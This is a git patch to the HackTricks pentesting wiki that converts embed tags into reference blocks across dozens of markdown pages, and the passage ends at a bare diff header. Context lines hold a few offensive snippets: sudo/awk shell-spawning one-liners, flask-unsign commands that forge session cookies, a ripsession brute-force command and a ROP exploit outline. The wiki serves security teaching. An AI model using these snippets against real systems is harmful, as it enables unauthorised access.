From 4374a7457b4fed8bc4ea6bd663710db22ff0edd9 Mon Sep 17 00:00:00 2001 From: Congon4tor Date: Fri, 3 Jan 2025 02:06:10 +0100 Subject: [PATCH 1/5] Fix embed urls --- src/README.md | 24 +++-- .../ret2dlresolve.md | 6 +- .../README.md | 6 +- src/burp-suite.md | 6 +- src/crypto-and-stego/esoteric-languages.md | 6 +- .../hash-length-extension-attack.md | 6 +- .../rc4-encrypt-and-decrypt.md | 10 +- .../hash-length-extension-attack.md | 6 +- src/cryptography/rc4-encrypt-and-decrypt.md | 10 +- .../external-recon-methodology/README.md | 14 ++- .../privilege-escalation/README.md | 10 +- .../docker-security/README.md | 11 ++- .../interesting-groups-linux-pe/README.md | 10 +- .../interesting-groups-linux-pe.md | 13 ++- src/misc/references.md | 95 ++++++++++++++----- .../5439-pentesting-redshift.md | 7 +- src/network-services-pentesting/9100-pjl.md | 7 +- .../9200-pentesting-elasticsearch.md | 9 +- .../pentesting-compaq-hp-insight-manager.md | 7 +- .../pentesting-kerberos-88/README.md | 7 +- .../pentesting-ssh.md | 11 +-- .../pentesting-web/buckets/README.md | 7 +- .../buckets/firebase-database.md | 7 +- ...solation-rce-via-electron-internal-code.md | 7 +- .../pentesting-web/flask.md | 11 ++- .../pentesting-web/graphql.md | 9 +- .../pentesting-web/uncovering-cloudflare.md | 7 +- .../pentesting-web/werkzeug.md | 9 +- .../pentesting-web/wordpress.md | 7 +- src/other-web-tricks.md | 9 +- src/pentesting-web/captcha-bypass.md | 7 +- .../client-side-template-injection-csti.md | 12 +-- src/pentesting-web/command-injection.md | 9 +- src/pentesting-web/crlf-0d-0a.md | 11 +-- .../README.md | 7 +- .../README.md | 7 +- src/pentesting-web/file-inclusion/README.md | 11 ++- .../file-inclusion/phar-deserialization.md | 11 +-- src/pentesting-web/file-upload/README.md | 9 +- .../hacking-jwt-json-web-tokens.md | 12 +-- src/pentesting-web/ldap-injection.md | 9 +- .../oauth-to-account-takeover.md | 9 +- ...inclusion-edge-side-inclusion-injection.md | 7 +- src/pentesting-web/sql-injection/README.md | 17 ++-- .../rce-with-postgresql-extensions.md | 7 +- .../README.md | 8 +- .../url-format-bypass.md | 7 +- .../README.md | 10 +- .../unicode-normalization.md | 7 +- ...ble-stylesheet-language-transformations.md | 7 +- .../xss-cross-site-scripting/README.md | 13 ++- .../xxe-xee-xml-external-entity.md | 13 ++- .../stack-overflow/ret2dlresolve.md | 7 +- .../srop-sigreturn-oriented-programming.md | 7 +- .../reversing-tools-basic-methods/README.md | 11 ++- src/stego/esoteric-languages.md | 7 +- src/todo/burp-suite.md | 7 +- src/todo/other-web-tricks.md | 7 +- src/todo/references.md | 95 ++++++++++++++----- .../active-directory-methodology/README.md | 7 +- .../printers-spooler-service-abuse.md | 7 +- .../authentication-credentials-uac-and-efs.md | 8 +- .../README.md | 7 +- src/windows-hardening/av-bypass.md | 17 ++-- .../README.md | 7 +- .../juicypotato.md | 10 +- 66 files changed, 398 insertions(+), 370 deletions(-) diff --git a/src/README.md b/src/README.md index b752c0e12..fae21c7b3 100644 --- a/src/README.md +++ b/src/README.md @@ -35,7 +35,9 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm [**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. -{% embed url="https://www.rootedcon.com/" %} +{{#ref}} +https://www.rootedcon.com/ +{{#endref}} --- @@ -47,7 +49,9 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! -{% embed url="https://go.intigriti.com/hacktricks" %} +{{#ref}} +https://go.intigriti.com/hacktricks +{{#endref}} --- @@ -60,7 +64,9 @@ Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banne Get Access Today: -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} +{{#ref}} +https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks +{{#endref}} --- @@ -86,7 +92,9 @@ Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to **Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports. -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} +{{#ref}} +https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons +{{#endref}} --- @@ -111,7 +119,9 @@ You can **create a free account** [**here**](https://serpapi.com/users/sign_up)* Learn the technologies and skills required to perform vulnerability research, penetration testing, and reverse engineering to protect mobile applications and devices. **Master iOS and Android security** through our on-demand courses and **get certified**: -{% embed url="https://academy.8ksec.io/" %} +{{#ref}} +https://academy.8ksec.io/ +{{#endref}} --- @@ -127,7 +137,9 @@ Another cool thing about WebSec is that unlike the industry average WebSec is ** In addition to the above WebSec is also a **committed supporter of HackTricks.** -{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %} +{{#ref}} +https://www.youtube.com/watch?v=Zq2JycGDCPM +{{#endref}} ## License & Disclaimer diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md index b3a3c1ab8..76be1e36c 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md @@ -17,7 +17,9 @@ Usually, all these structures are faked by making an **initial ROP chain that ca Chek this video for a nice explanation about this technique in the second half of the video: -{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %} +{{#ref}} +https://youtu.be/ADULSwnQs-s?feature=shared +{{#endref}} Or check these pages for a step-by-step explanation: @@ -195,5 +197,3 @@ target.interactive() - 32bit, no relro, no canary, nx, no pie, basic small buffer overflow and return. To exploit it the bof is used to call `read` again with a `.bss` section and a bigger size, to store in there the `dlresolve` fake tables to load `system`, return to main and re-abuse the initial bof to call dlresolve and then `system('/bin/sh')`. {{#include ../../banners/hacktricks-training.md}} - - diff --git a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md index 06cfe6a0d..603ecae17 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md @@ -59,7 +59,9 @@ If you are curious this is the **sigcontext structure** stored in the stack to l For a better explanation check also: -{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %} +{{#ref}} +https://youtu.be/ADULSwnQs-s?feature=shared +{{#endref}} ## Example @@ -143,5 +145,3 @@ target.interactive() - SROP is used to give execution privileges (memprotect) to the place where a shellcode was placed. {{#include ../../../banners/hacktricks-training.md}} - - diff --git a/src/burp-suite.md b/src/burp-suite.md index 57504ea27..a14e6194b 100644 --- a/src/burp-suite.md +++ b/src/burp-suite.md @@ -10,10 +10,10 @@ [https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload to execute commands and grab the output via DNS requests to burpcollab. -{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %} +{{#ref}} +https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e +{{#endref}} [https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator) {{#include ./banners/hacktricks-training.md}} - - diff --git a/src/crypto-and-stego/esoteric-languages.md b/src/crypto-and-stego/esoteric-languages.md index 2b1be3259..ac5159708 100644 --- a/src/crypto-and-stego/esoteric-languages.md +++ b/src/crypto-and-stego/esoteric-languages.md @@ -52,7 +52,9 @@ Take it to the top Whisper my world ``` -{% embed url="https://codewithrockstar.com/" %} +{{#ref}} +https://codewithrockstar.com/ +{{#endref}} ## PETOOH @@ -67,5 +69,3 @@ Kukarek ``` {{#include ../banners/hacktricks-training.md}} - - diff --git a/src/crypto-and-stego/hash-length-extension-attack.md b/src/crypto-and-stego/hash-length-extension-attack.md index b24f88bd8..1bd54181e 100644 --- a/src/crypto-and-stego/hash-length-extension-attack.md +++ b/src/crypto-and-stego/hash-length-extension-attack.md @@ -29,12 +29,12 @@ If an attacker wants to append the string "append" he can: ### **Tool** -{% embed url="https://github.com/iagox86/hash_extender" %} +{{#ref}} +https://github.com/iagox86/hash_extender +{{#endref}} ### References You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) {{#include ../banners/hacktricks-training.md}} - - diff --git a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md index 00e933705..1ee4b453d 100644 --- a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md +++ b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md @@ -4,10 +4,12 @@ If you can somehow encrypt a plaintext using RC4, you can decrypt any content en If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine: -{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} +{{#ref}} +https://0xrick.github.io/hack-the-box/kryptos/ +{{#endref}} -{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} +{{#ref}} +https://0xrick.github.io/hack-the-box/kryptos/ +{{#endref}} {{#include ../banners/hacktricks-training.md}} - - diff --git a/src/cryptography/hash-length-extension-attack.md b/src/cryptography/hash-length-extension-attack.md index 3bcd0e4a2..dc51fa07b 100644 --- a/src/cryptography/hash-length-extension-attack.md +++ b/src/cryptography/hash-length-extension-attack.md @@ -27,12 +27,12 @@ If an attacker wants to append the string "append" he can: ## **Tool** -{% embed url="https://github.com/iagox86/hash_extender" %} +{{#ref}} +https://github.com/iagox86/hash_extender +{{#endref}} ## References You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) {{#include ../banners/hacktricks-training.md}} - - diff --git a/src/cryptography/rc4-encrypt-and-decrypt.md b/src/cryptography/rc4-encrypt-and-decrypt.md index 00e933705..1ee4b453d 100644 --- a/src/cryptography/rc4-encrypt-and-decrypt.md +++ b/src/cryptography/rc4-encrypt-and-decrypt.md @@ -4,10 +4,12 @@ If you can somehow encrypt a plaintext using RC4, you can decrypt any content en If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine: -{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} +{{#ref}} +https://0xrick.github.io/hack-the-box/kryptos/ +{{#endref}} -{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} +{{#ref}} +https://0xrick.github.io/hack-the-box/kryptos/ +{{#endref}} {{#include ../banners/hacktricks-training.md}} - - diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/README.md b/src/generic-methodologies-and-resources/external-recon-methodology/README.md index 21179e3d8..d265008a4 100644 --- a/src/generic-methodologies-and-resources/external-recon-methodology/README.md +++ b/src/generic-methodologies-and-resources/external-recon-methodology/README.md @@ -2,7 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} - ## Assets discoveries > So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns. @@ -199,8 +198,6 @@ Check for some [domain takeover](../../pentesting-web/domain-subdomain-takeover. If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\ &#xNAN;_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._ - - ## Subdomains > We know all the companies inside the scope, all the assets of each company and all the domains related to the companies. @@ -482,9 +479,13 @@ echo www | subzuf facebook.com Check this blog post I wrote about how to **automate the subdomain discovery** from a domain using **Trickest workflows** so I don't need to launch manually a bunch of tools in my computer: -{% embed url="https://trickest.com/blog/full-subdomain-discovery-using-workflow/" %} +{{#ref}} +https://trickest.com/blog/full-subdomain-discovery-using-workflow/ +{{#endref}} -{% embed url="https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/" %} +{{#ref}} +https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/ +{{#endref}} ### **VHosts / Virtual Hosts** @@ -708,7 +709,4 @@ There are several tools out there that will perform part of the proposed actions - All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI) - {{#include ../../banners/hacktricks-training.md}} - - diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md index 2fb4e830e..5cdc82530 100644 --- a/src/linux-hardening/privilege-escalation/README.md +++ b/src/linux-hardening/privilege-escalation/README.md @@ -1049,9 +1049,13 @@ The project collects legitimate functions of Unix binaries that can be abused to > strace -o /dev/null /bin/sh\ > sudo awk 'BEGIN {system("/bin/sh")}' -{% embed url="https://gtfobins.github.io/" %} +{{#ref}} +https://gtfobins.github.io/ +{{#endref}} -{% embed url="https://gtfoargs.github.io/" %} +{{#ref}} +https://gtfoargs.github.io/ +{{#endref}} ### FallOfSudo @@ -1655,5 +1659,3 @@ cisco-vmanage.md - [https://www.linode.com/docs/guides/what-is-systemd/](https://www.linode.com/docs/guides/what-is-systemd/) {{#include ../../banners/hacktricks-training.md}} - - diff --git a/src/linux-hardening/privilege-escalation/docker-security/README.md b/src/linux-hardening/privilege-escalation/docker-security/README.md index 4fd8f33e2..5860b72c4 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/README.md +++ b/src/linux-hardening/privilege-escalation/docker-security/README.md @@ -341,13 +341,17 @@ In Kubernetes environments, secrets are natively supported and can be further ma **gVisor** is an application kernel, written in Go, that implements a substantial portion of the Linux system surface. It includes an [Open Container Initiative (OCI)](https://www.opencontainers.org) runtime called `runsc` that provides an **isolation boundary between the application and the host kernel**. The `runsc` runtime integrates with Docker and Kubernetes, making it simple to run sandboxed containers. -{% embed url="https://github.com/google/gvisor" %} +{{#ref}} +https://github.com/google/gvisor +{{#endref}} ### Kata Containers **Kata Containers** is an open source community working to build a secure container runtime with lightweight virtual machines that feel and perform like containers, but provide **stronger workload isolation using hardware virtualization** technology as a second layer of defense. -{% embed url="https://katacontainers.io/" %} +{{#ref}} +https://katacontainers.io/ +{{#endref}} ### Summary Tips @@ -403,7 +407,4 @@ authz-and-authn-docker-access-authorization-plugin.md - [https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57](https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57) - [https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/](https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/) - {{#include ../../../banners/hacktricks-training.md}} - - diff --git a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md index 92cbb164a..8dd8187fa 100644 --- a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md +++ b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md @@ -241,9 +241,13 @@ Finally, if you don't like any of the suggestions of before, or they aren't work If you have write permissions over the docker socket read [**this post about how to escalate privileges abusing the docker socket**](../#writable-docker-socket)**.** -{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %} +{{#ref}} +https://github.com/KrustyHack/docker-privilege-escalation +{{#endref}} -{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %} +{{#ref}} +https://fosterelli.co/privilege-escalation-via-docker.html +{{#endref}} ## lxc/lxd Group @@ -262,5 +266,3 @@ Inside OpenBSD the **auth** group usually can write in the folders _**/etc/skey* These permissions may be abused with the following exploit to **escalate privileges** to root: [https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot) {{#include ../../../banners/hacktricks-training.md}} - - diff --git a/src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md b/src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md index 5fec677b3..19a8323d2 100644 --- a/src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md +++ b/src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md @@ -1,7 +1,5 @@ - {{#include ../../banners/hacktricks-training.md}} - # Sudo/Admin Groups ## **PE - Method 1** @@ -158,15 +156,16 @@ find / -group root -perm -g=w 2>/dev/null You can mount the root filesystem of the host machine to an instance’s volume, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine. -{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %} +{{#ref}} +https://github.com/KrustyHack/docker-privilege-escalation +{{#endref}} -{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %} +{{#ref}} +https://fosterelli.co/privilege-escalation-via-docker.html +{{#endref}} # lxc/lxd Group [lxc - Privilege Escalation](lxd-privilege-escalation.md) - {{#include ../../banners/hacktricks-training.md}} - - diff --git a/src/misc/references.md b/src/misc/references.md index 7b4e414f8..eb3792a1f 100644 --- a/src/misc/references.md +++ b/src/misc/references.md @@ -1,52 +1,95 @@ {{#include ../banners/hacktricks-training.md}} -{% embed url="https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick" %} +{{#ref}} +https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick +{{#endref}} -{% embed url="https://hausec.com/pentesting-cheatsheet/#_Toc475368982" %} +{{#ref}} +https://hausec.com/pentesting-cheatsheet/#_Toc475368982 +{{#endref}} -{% embed url="https://anhtai.me/pentesting-cheatsheet/" %} +{{#ref}} +https://anhtai.me/pentesting-cheatsheet/ +{{#endref}} -{% embed url="https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html" %} +{{#ref}} +https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html +{{#endref}} -{% embed url="https://ired.team/offensive-security-experiments/offensive-security-cheetsheets" %} +{{#ref}} +https://ired.team/offensive-security-experiments/offensive-security-cheetsheets +{{#endref}} -{% embed url="https://chryzsh.gitbooks.io/pentestbook/basics_of_windows.html" %} +{{#ref}} +https://chryzsh.gitbooks.io/pentestbook/basics_of_windows.html +{{#endref}} -{% embed url="https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md" %} +{{#ref}} +https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md +{{#endref}} -{% embed url="https://anhtai.me/oscp-fun-guide/" %} +{{#ref}} +https://anhtai.me/oscp-fun-guide/ +{{#endref}} -{% embed url="https://www.thehacker.recipes/" %} +{{#ref}} +https://www.thehacker.recipes/ +{{#endref}} -{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings" %} +{{#ref}} +https://github.com/swisskyrepo/PayloadsAllTheThings +{{#endref}} -{% embed url="https://gtfobins.github.io/" %} +{{#ref}} +https://gtfobins.github.io/ +{{#endref}} -{% embed url="https://github.com/RistBS/Awesome-RedTeam-Cheatsheet" %} +{{#ref}} +https://github.com/RistBS/Awesome-RedTeam-Cheatsheet +{{#endref}} -{% embed url="https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet" %} +{{#ref}} +https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet +{{#endref}} -{% embed url="https://hideandsec.sh/" %} +{{#ref}} +https://hideandsec.sh/ +{{#endref}} -{% embed url="https://cheatsheet.haax.fr/" %} +{{#ref}} +https://cheatsheet.haax.fr/ +{{#endref}} -{% embed url="https://infosecwriteups.com/" %} +{{#ref}} +https://infosecwriteups.com/ +{{#endref}} -{% embed url="https://www.exploit-db.com/" %} +{{#ref}} +https://www.exploit-db.com/ +{{#endref}} -{% embed url="https://wadcoms.github.io/" %} +{{#ref}} +https://wadcoms.github.io/ +{{#endref}} -{% embed url="https://lolbas-project.github.io" %} +{{#ref}} +https://lolbas-project.github.io +{{#endref}} -{% embed url="https://pentestbook.six2dez.com/" %} +{{#ref}} +https://pentestbook.six2dez.com/ +{{#endref}} -{% embed url="https://www.hackingarticles.in/" %} +{{#ref}} +https://www.hackingarticles.in/ +{{#endref}} -{% embed url="https://pentestlab.blog/" %} +{{#ref}} +https://pentestlab.blog/ +{{#endref}} -{% embed url="https://ippsec.rocks/" %} +{{#ref}} +https://ippsec.rocks/ +{{#endref}} {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/5439-pentesting-redshift.md b/src/network-services-pentesting/5439-pentesting-redshift.md index 3dba7811d..9fb89cfc1 100644 --- a/src/network-services-pentesting/5439-pentesting-redshift.md +++ b/src/network-services-pentesting/5439-pentesting-redshift.md @@ -8,9 +8,8 @@ This port is used by **Redshift** to run. It's basically an AWS variation of **P For more information check: -{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-databases/aws-redshift-enum" %} +{{#ref}} +https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-databases/aws-redshift-enum +{{#endref}} {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/9100-pjl.md b/src/network-services-pentesting/9100-pjl.md index ddbb65ea2..d81184531 100644 --- a/src/network-services-pentesting/9100-pjl.md +++ b/src/network-services-pentesting/9100-pjl.md @@ -54,13 +54,12 @@ msf> use auxiliary/scanner/printer/printer_delete_file This is the tool you want to use to abuse printers: -{% embed url="https://github.com/RUB-NDS/PRET" %} +{{#ref}} +https://github.com/RUB-NDS/PRET +{{#endref}} # **Shodan** - `pjl port:9100` {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/9200-pentesting-elasticsearch.md b/src/network-services-pentesting/9200-pentesting-elasticsearch.md index fbaf650d7..12dbe733e 100644 --- a/src/network-services-pentesting/9200-pentesting-elasticsearch.md +++ b/src/network-services-pentesting/9200-pentesting-elasticsearch.md @@ -2,7 +2,6 @@ {{#include ../banners/hacktricks-training.md}} - ## Basic information Elasticsearch is a **distributed**, **open source** search and analytics engine for **all types of data**. It is known for its **speed**, **scalability**, and **simple REST APIs**. Built on Apache Lucene, it was first released in 2010 by Elasticsearch N.V. (now known as Elastic). Elasticsearch is the core component of the Elastic Stack, a collection of open source tools for data ingestion, enrichment, storage, analysis, and visualization. This stack, commonly referred to as the ELK Stack, also includes Logstash and Kibana, and now has lightweight data shipping agents called Beats. @@ -176,14 +175,12 @@ Some tools will obtain some of the data presented before: msf > use auxiliary/scanner/elasticsearch/indices_enum ``` -{% embed url="https://github.com/theMiddleBlue/nmap-elasticsearch-nse" %} +{{#ref}} +https://github.com/theMiddleBlue/nmap-elasticsearch-nse +{{#endref}} ## Shodan - `port:9200 elasticsearch` - {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md index 4a36b9352..924502f45 100644 --- a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md +++ b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md @@ -4,7 +4,9 @@ # **Default passwords** -{% embed url="http://www.vulnerabilityassessment.co.uk/passwordsC.htm" %} +{{#ref}} +http://www.vulnerabilityassessment.co.uk/passwordsC.htm +{{#endref}} # Config files @@ -19,6 +21,3 @@ jboss-service.xml ``` {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/pentesting-kerberos-88/README.md b/src/network-services-pentesting/pentesting-kerberos-88/README.md index 9f396aa6b..71820b4b3 100644 --- a/src/network-services-pentesting/pentesting-kerberos-88/README.md +++ b/src/network-services-pentesting/pentesting-kerberos-88/README.md @@ -29,7 +29,9 @@ PORT STATE SERVICE The MS14-068 flaw permits an attacker to tamper with a legitimate user's Kerberos login token to falsely claim elevated privileges, such as being a Domain Admin. This counterfeit claim is mistakenly validated by the Domain Controller, enabling unauthorized access to network resources across the Active Directory forest. -{% embed url="https://adsecurity.org/?p=541" %} +{{#ref}} +https://adsecurity.org/?p=541 +{{#endref}} Other exploits: [https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek) @@ -66,6 +68,3 @@ Entry_4: ``` {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/pentesting-ssh.md b/src/network-services-pentesting/pentesting-ssh.md index 6430b522b..e38740ce7 100644 --- a/src/network-services-pentesting/pentesting-ssh.md +++ b/src/network-services-pentesting/pentesting-ssh.md @@ -2,8 +2,6 @@ {{#include ../banners/hacktricks-training.md}} - - ## Basic Information **SSH (Secure Shell or Secure Socket Shell)** is a network protocol that enables a secure connection to a computer over an unsecured network. It is essential for maintaining the confidentiality and integrity of data when accessing remote systems. @@ -135,7 +133,9 @@ Or use `ssh-keybrute.py` (native python3, lightweight and has legacy algorithms #### Known badkeys can be found here: -{% embed url="https://github.com/rapid7/ssh-badkeys/tree/master/authorized" %} +{{#ref}} +https://github.com/rapid7/ssh-badkeys/tree/master/authorized +{{#endref}} #### Weak SSH keys / Debian predictable PRNG @@ -318,8 +318,6 @@ id_rsa - You can find interesting guides on how to harden SSH in [https://www.ssh-audit.com/hardening_guides.html](https://www.ssh-audit.com/hardening_guides.html) - [https://community.turgensec.com/ssh-hacking-guide](https://community.turgensec.com/ssh-hacking-guide) - - ## HackTricks Automatic Commands ``` @@ -341,6 +339,3 @@ Entry_2: ``` {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/pentesting-web/buckets/README.md b/src/network-services-pentesting/pentesting-web/buckets/README.md index 02a21b5e7..498f20fa7 100644 --- a/src/network-services-pentesting/pentesting-web/buckets/README.md +++ b/src/network-services-pentesting/pentesting-web/buckets/README.md @@ -4,9 +4,8 @@ Check this page if you want to learn more about enumerating and abusing Buckets: -{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum" %} +{{#ref}} +https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum +{{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md index 914b893a3..5e7b54490 100644 --- a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md +++ b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md @@ -8,9 +8,8 @@ Firebase is a Backend-as-a-Services mainly for mobile application. It is focused Learn more about Firebase in: -{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-firebase-enum" %} +{{#ref}} +https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-firebase-enum +{{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md index 89a666475..f79ea35d5 100644 --- a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md +++ b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md @@ -17,7 +17,9 @@ process.on("exit", function () { }) ``` -{% embed url="https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36" %} +{{#ref}} +https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36 +{{#endref}} ![](<../../../images/image (1070).png>) @@ -61,6 +63,3 @@ Exploit:
{{#include ../../../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/pentesting-web/flask.md b/src/network-services-pentesting/pentesting-web/flask.md index ab4f82e9f..88a03df18 100644 --- a/src/network-services-pentesting/pentesting-web/flask.md +++ b/src/network-services-pentesting/pentesting-web/flask.md @@ -26,7 +26,9 @@ The cookie is also signed using a password Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys. -{% embed url="https://pypi.org/project/flask-unsign/" %} +{{#ref}} +https://pypi.org/project/flask-unsign/ +{{#endref}} ```bash pip3 install flask-unsign @@ -60,7 +62,9 @@ flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy Command line tool to brute-force websites using cookies crafted with flask-unsign. -{% embed url="https://github.com/Tagvi/ripsession" %} +{{#ref}} +https://github.com/Tagvi/ripsession +{{#endref}} ```bash ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt @@ -100,6 +104,3 @@ app.run(host='0.0.0.0', port=8080) Could allow to introduce something like "@attacker.com" in order to cause a **SSRF**. {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/pentesting-web/graphql.md 